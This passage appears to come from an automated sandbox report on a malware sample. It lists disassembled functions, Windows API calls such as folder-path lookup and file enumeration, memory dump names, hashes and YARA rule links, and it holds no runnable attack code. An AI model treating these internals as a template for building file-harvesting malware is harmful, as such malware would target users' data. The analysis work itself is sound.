                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 829699645a2ae1b7b96e1a27b2a2f63fb875ef443dcb28644fc1deffd4f27af0
                                        • Instruction ID: 2779bf19ea75178b427ed0c2f7ffdcfa665d71d65f9cc27c888e80ac69337f40
                                        • Opcode Fuzzy Hash: 829699645a2ae1b7b96e1a27b2a2f63fb875ef443dcb28644fc1deffd4f27af0
                                        • Instruction Fuzzy Hash: B7F0B4B29443189BD724FBB89803B4E33A0AF80720F15014AF514A73D2CB3859409BA6
                                        Function 009F04D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: f17cf9adddb26f9b4a614f829d0b37f7f550d57578fe720205c60ed16bd2eed1
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: 45415B7190020DAFCF16DF95DC81AAE7BB9BF88304F184159FA04A7252D37599A0DF50
                                        Function 00985190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 009851CA
                                        • lstrcat.KERNEL32(?,00991058), ref: 009851E7
                                        • lstrcat.KERNEL32(?,01818AD8), ref: 009851FB
                                        • lstrcat.KERNEL32(?,0099105C), ref: 0098520D
                                          • Part of subcall function 00984B60: wsprintfA.USER32 ref: 00984B7C
                                          • Part of subcall function 00984B60: FindFirstFileA.KERNEL32(?,?), ref: 00984B93
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC4), ref: 00984BC1
                                          • Part of subcall function 00984B60: StrCmpCA.SHLWAPI(?,00990FC8), ref: 00984BD7
                                          • Part of subcall function 00984B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00984DCD
                                          • Part of subcall function 00984B60: FindClose.KERNEL32(000000FF), ref: 00984DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: a41a1af592d7a3115ad31fe418bc775d0507a5c4dcdd600edec4bf8d013b9ee7
                                        • Instruction ID: 0ee85ad844be1de2d271a17fa5ff0e717d1cb2442be0e6124165cde7adb3fc02
                                        • Opcode Fuzzy Hash: a41a1af592d7a3115ad31fe418bc775d0507a5c4dcdd600edec4bf8d013b9ee7
                                        • Instruction Fuzzy Hash: 6F21DD7A900208ABDB14FBB0EC46FED333CBBD5300F404555B65956195EFB49ACC8B91